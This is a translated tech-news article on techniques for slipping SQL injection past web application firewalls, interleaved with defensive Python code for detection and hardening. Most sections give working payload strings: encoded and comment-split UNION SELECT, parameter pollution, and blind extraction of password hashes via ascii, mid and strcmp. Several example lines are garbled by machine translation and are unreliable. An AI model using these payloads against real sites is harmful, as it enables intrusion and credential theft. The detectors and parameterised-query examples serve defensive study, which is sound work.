
WAF Bypass Technology in SQL injection

2025-01-15 Update From: SLTechnology News&Howtos shulou


Shulou(Shulou.com)06/01 Report--

1. Case bypass

This is the trick everyone knows, but it still works against poorly written WAFs: if union is intercepted, try Union, UnIoN and similar variations of case.

2. Simple encoding bypass

If the WAF detects keywords, we make the keyword unrecognizable to it. For example, to get past a check for union, we write %55, the URL-encoded form of U (0x55), in place of U, giving %55nION. Combining encoding with case changes also bypasses some WAFs. Any one or more of the characters can be replaced this way.

Hex-encoding the table name, or the file name passed to load_file(), in MySQL injection to get past a WAF belongs to the same category.

3. Comment Bypass

This is rare; it applies when the WAF only filters a dangerous statement out once rather than blocking the whole query.

union select 1,2,3/*

For the query above, the WAF filters union and select once. So we write a comment containing those words in front of the query and let the WAF filter the comment instead; our actual query is unaffected.

So the bypass statement is:

01.According to Universe Universe, Universe Universe SelectAccording to SelectAccording to Universe Universe

There is also a bypass related to comments:

For example:

index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4...

As you can see, it is enough to put the sensitive words inside comments; note that a ! must be added after the opening /* (MySQL executes the contents of /*! ... */ comments).

4. Separation and rewriting bypass

Unlike the example above, this applies when the WAF uses regular expressions that detect every sensitive word no matter where it appears, and filters all of them.

We can split the sensitive words with comments so that the WAF's rules no longer match, while the query still executes correctly once it reaches the database.

01.According to unracking, ionizing, selling, racing, ectprinting, unwinding, unracking, racing, etc.

As for rewriting bypass, it works when the WAF filters only once: in the same way one writes aaspsp when uploading an asp trojan, we write Ununionion. The WAF removes union once, what remains is union, and our query executes.

?id=1 ununionion select 1,2,3--
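To make the first four sections concrete from the defender's side, here is an added example (not code from the original article): a canonicalization step that undoes the encodings described above before a keyword rule runs, beside the "rubbish" raw-substring rule of section 1 and the strip-once sanitizer that sections 3 and 4 target. The keyword list, the sample values and the decision function are constructed for this demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed for the demo: the two keywords the article's examples hide.
KEYWORDS = ("union", "select")


def canonicalize(raw: str) -> str:
    """Rewrite a request value into the form the database will actually see."""
    s = raw
    for _ in range(3):                       # percent-decode until stable (double encoding)
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # MySQL executes the body of /*! ... */, so keep the body; a plain /* ... */
    # is dropped without a replacement, which glues un/**/ion back into union.
    s = re.sub(r"/\*!\s*(.*?)\*/", r"\1", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip().lower()


def naive_match(raw: str) -> bool:
    """Section 1's 'rubbish' rule: exact lowercase substring on the raw value."""
    return any(k in raw for k in KEYWORDS)


def strip_once(raw: str) -> str:
    """Sections 3 and 4's sanitizer: delete each keyword a single time and forward the rest."""
    out = raw
    for k in KEYWORDS:
        out = re.sub(re.escape(k), "", out, count=1, flags=re.I)
    return out


def detect(raw: str) -> bool:
    """Match on the canonical form, not on the raw bytes."""
    s = canonicalize(raw)
    return any(k in s for k in KEYWORDS)


def decide(raw: str) -> str:
    """Block the request outright; never rewrite a value and pass it on."""
    return "block" if detect(raw) else "allow"


# Constructed samples following the article's patterns, plus one benign value.
SAMPLES = {
    "case":          "?id=1 UnIoN SeLeCt 1,2,3",
    "encoded":       "?id=1 %55nION %53elect 1,2,3",
    "mysql_comment": "?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",
    "split":         "?id=1 un/**/ion sel/**/ect 1,2,3--",
    "rewrite":       "?id=1 ununionion select 1,2,3--",
    "benign":        "?id=15&sort=name",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:14} raw-substring={naive_match(value)!s:5} "
              f"after-strip-once={strip_once(value)!r:40} canonical={decide(value)}")
```

Running it shows the raw-substring rule missing four of the five hostile values, the strip-once output for ununionion still containing union (which is why a sanitizer must reject rather than rewrite), and the canonical rule blocking all five while allowing the benign value.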

5. HTTP parameter pollution (HPP)

For example, suppose we have a statement like this:

/?id=1 union select+1,2,3+from+users+where+id=1--

We can repeat the id parameter and put the rest of our payload in the second copy; in frameworks that join duplicated parameters, the &id= becomes a comma in the resulting query:

/?id=1 union select+1&id=2,3+from+users+where+id=1--

Whether this succeeds depends on many conditions, above all on the specific WAF and server implementation.

Another example illustrates the usage:

01.According to UBG / UsMY / USML / UsMel-

The specific analysis depends on how the query is built in the back-end code.

For example, suppose the server code looks like this:

"select * from table where a = ".$_GET['a']." and b = ".$_GET['b']." limit ".$_GET['c']

Then we can construct an injection statement like this:

?a=1+union/*&b=*/select+1,password/*&c=*/from+users--

The server resolves it to:

select * from table where a=1 union/* and b=*/select 1,password/* limit */from users--

As you can see, this method is better suited to white-box testing; in a black-box test it is more troublesome, but still worth trying.
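The two halves of this section, the duplicated-parameter join and the concatenated back-end query, can be reproduced in a few lines. The following is an added example, not code from the article: the concatenated handler beside a parameterised one, and a strict query-string parser that refuses repeated names. An in-memory SQLite database stands in for MySQL, and the table and column contents are constructed for the demo.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed schema standing in for the article's `table` and `users`.
SCHEMA = """
create table t(a integer, b integer);
insert into t values (1, 1), (2, 2);
create table users(login text, password text);
insert into users values ('admin', 'constructed-secret');
"""


def demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_concatenated(a: str, b: str, c: str) -> str:
    """The article's PHP pattern: three request values glued into one SQL string."""
    return f"select * from t where a = {a} and b = {b} limit {c}"


def run_concatenated(conn, a, b, c):
    """Vulnerable handler: comment markers inside a, b and c rewrite the statement."""
    return conn.execute(build_concatenated(a, b, c)).fetchall()


def run_parameterised(conn, a, b, c):
    """Hardened handler: validate the limit, bind the rest; values never become syntax."""
    try:
        limit = int(c)
    except ValueError:
        return "rejected: limit must be an integer"
    return conn.execute("select * from t where a = ? and b = ? limit ?", (a, b, limit)).fetchall()


def fuse_duplicates(query_string: str, name: str) -> str:
    """Model of a back end that joins repeated parameters with a comma (the HPP precondition)."""
    return ",".join(parse_qs(query_string, keep_blank_values=True).get(name, []))


def duplicate_names(query_string: str) -> list:
    """Names that occur more than once in the query string."""
    params = parse_qs(query_string, keep_blank_values=True)
    return sorted(k for k, v in params.items() if len(v) > 1)


def parse_strict(query_string: str) -> dict:
    """Defensive parser: a repeated parameter name is an error, not a value to merge."""
    dupes = duplicate_names(query_string)
    if dupes:
        raise ValueError(f"duplicate parameter(s): {dupes}")
    return {k: v[0] for k, v in parse_qs(query_string, keep_blank_values=True).items()}


if __name__ == "__main__":
    conn = demo_db()
    a, b, c = "1 union/*", "*/select 1,password/*", "*/from users--"
    print(build_concatenated(a, b, c))
    print("concatenated :", run_concatenated(conn, a, b, c))
    print("parameterised:", run_parameterised(conn, a, b, c))
    print("parameterised:", run_parameterised(conn, a, b, "5"))
    hpp = "id=1 union select+1&id=2,3+from+users+where+id=1--"
    print("fused id     :", fuse_duplicates(hpp, "id"))
    print("duplicates   :", duplicate_names(hpp))
```

With the concatenated handler the three values collapse into the single statement the article shows and the users row comes back; with placeholders the same values are compared as literal text (no row matches) and a non-numeric limit is rejected before any SQL runs. The strict parser turns the HPP precondition into a hard error instead of a silent join.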

6. Use the logical operator or / and to bypass

/?id=1+OR+0x50=0x50

/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

To explain the second statement, start from the innermost parentheses: select+pwd+from+users+limit+1,1 queries the first record of the pwd field from the users table, for example admin.

Then mid(<that subquery>, 1, 1) takes the first character of admin, that is, a.

lower converts the character to lowercase.

Then ascii converts a into its ASCII code, and the result is compared with 74; for a it is not equal.

7. Comparison operator replacement

These include != (not equal), <> (not equal), < (less than) and > (greater than); all of them can be used in place of = to bypass.

For example, to determine in the previous example whether the value is 74 when = is filtered, we can test whether it is greater than 73 and whether it is less than 75, which tells us it is 74. Many WAFs forget this.

8. Substitution of the same function

substring() can be replaced with functions such as mid() and substr(); all of them take part of a string.

ascii() can be replaced with hex() or bin(), i.e. the hexadecimal or binary code. benchmark() can be replaced with sleep(); both were introduced with time-based blind injection.

If even these are blocked, there is a new way:

substring((select 'password'),1)=0x70

substr((select 'password'),1)=0x70

mid((select 'password'),1)=0x70

The three statements above all test the value of the first character of password. You can use:

strcmp(left('password',1),0x69)=1

strcmp(left('password',1),0x70)=0

strcmp(left('password',1),0x71)=-1

instead: left takes one character from the left of the string, and strcmp compares two values, returning 0 when they are equal, -1 when the left operand is smaller, and 1 otherwise.

The group_concat, concat and concat_ws functions mentioned in the previous article can also be substituted for each other.

9. Blind injection without or and and

For example, there is an injection point like this:

index.php?uid=123

and and or are filtered. There is a more direct way: make our statement evaluate to the original 123:

index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123

The page renders correctly for 123, and we are now blindly guessing the first character of hash. If the first character equals 0x42, that is B, strcmp returns 0, the expression evaluates to 0+123=123 and the page should render correctly; otherwise it is not B. Guessing this way needs neither and nor or.
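Sections 6 to 9 share one lesson for the detection side: a rule that keys on a single spelling (only =, only substring(), only the words and/or) misses every equivalent the article lists. The following added example (not code from the article) expresses each group of equivalents as one family rule and classifies the article's own request values after percent-decoding; comment and case normalisation is assumed to have happened upstream, and the family names, thresholds and samples are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Each rule names the whole family of equivalents from sections 6-8, so swapping
# substring() for mid(), or = for >, changes nothing for the rule.
FAMILIES = {
    "boolean_glue":   r"\b(and|or)\b",
    "char_extract":   r"\b(substring|substr|mid|left)\s*\(",
    "char_to_number": r"\b(ascii|hex|bin)\s*\(",
    "string_compare": r"\bstrcmp\s*\(",
    "time_delay":     r"\b(benchmark|sleep)\s*\(",
    "paren_compare":  r"\)\s*(=|!=|<>|<|>)\s*-?\d+",
    "hex_compare":    r"0x[0-9a-f]+\s*(=|!=|<>|<|>)|(=|!=|<>|<|>)\s*0x[0-9a-f]+",
    "subquery":       r"\(\s*select\b",
}

# Section 9's point: and/or are only glue and are never required, so they do not
# decide on their own; every other family is evidence of SQL being evaluated.
STRONG = set(FAMILIES) - {"boolean_glue"}


def classify(raw: str) -> list:
    """Names of every family that matches the percent-decoded, lower-cased value."""
    s = unquote_plus(raw).lower()
    return sorted(name for name, pat in FAMILIES.items() if re.search(pat, s))


def is_suspicious(raw: str) -> bool:
    return bool(STRONG & set(classify(raw)))


# Constructed samples: the article's values from sections 6, 8 and 9, plus a benign one.
SAMPLES = [
    "/?id=1+OR+0x50=0x50",
    "/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74",
    "strcmp(left('password',1),0x70)=0",
    "index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123",
    "index.php?uid=123&page=2",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(f"{is_suspicious(value)!s:5} {classify(value)}  <- {value}")
```

The section 9 value is the instructive row: it carries no boolean_glue at all, yet still hits char_extract, string_compare and subquery, so a rule set that waits for and/or would let it through while the family rules flag it.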

10. Add parentheses

union+(select+1,2+from+users)

For example, the above was intercepted by the WAF. Try adding some parentheses:

union+(select+1,2+from+xxx)

union(select(1),mid(hash,1,32)from(users))

union+(select'1',concat(login,hash)from+users)

union(select(1),hex(hash)from(users))

(1)or(0x50=0x50)

11. Buffer overflow bypass

This was seen on a foreign blog:

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36

The more A characters in 0xAAAAAAAAAAAAAAAAAAAAA the better; generally more than 1000 are needed.
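Sections 10 and 11 point at two inspection mistakes rather than at new SQL: a keyword rule that only splits on whitespace cannot see union inside union(select(1),...), and a value carrying a hex literal of a thousand digits is itself an anomaly worth flagging. The following added example (not code from the article) shows a whitespace-split rule beside a tokenising rule, and a long-hex-literal check; the threshold, the shortened column list and the samples are constructed for the demo.

```python
import re

KEYWORDS = {"union", "select"}
MAX_HEX_DIGITS = 64        # constructed threshold; ordinary parameters rarely carry long hex blobs


def whitespace_rule(value: str) -> bool:
    """Weak rule: treats only whitespace and '+' as word boundaries."""
    return any(word in KEYWORDS for word in re.split(r"[\s+]+", value.lower()))


def tokens(value: str) -> list:
    """Split on every non-word character, so parentheses and commas cannot hide a keyword."""
    return re.findall(r"[a-z_]+", value.lower())


def token_rule(value: str) -> bool:
    return bool(KEYWORDS & set(tokens(value)))


def long_hex_literal(value: str) -> bool:
    """Flag hex literals far longer than any legitimate identifier or hash."""
    return any(len(digits) > MAX_HEX_DIGITS
               for digits in re.findall(r"0x([0-9a-f]+)", value.lower()))


def padded_payload(n: int) -> str:
    """Section 11's shape with n padding characters (constructed; column list shortened)."""
    return "id=1 and (select 1)=(Select 0x" + "A" * n + ")+UnIoN+SeLeCT+1,2,version(),4,5,user()--"


if __name__ == "__main__":
    # Constructed samples: section 10's intercepted form, two of its parenthesised
    # forms, section 11's padded form and a benign value.
    for value in ["union+(select+1,2+from+users)",
                  "union(select(1),mid(hash,1,32)from(users))",
                  "union(select(1),hex(hash)from(users))",
                  padded_payload(1200),
                  "id=15&sort=name"]:
        print(f"whitespace={whitespace_rule(value)!s:5} tokens={token_rule(value)!s:5} "
              f"long_hex={long_hex_literal(value)!s:5} <- {value[:60]}")
```

The whitespace rule catches the first form and nothing else from section 10, the token rule catches all three, and the padded value is the only one whose hex literal exceeds the threshold, so the size check adds an independent signal even when a keyword rule is evaded.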
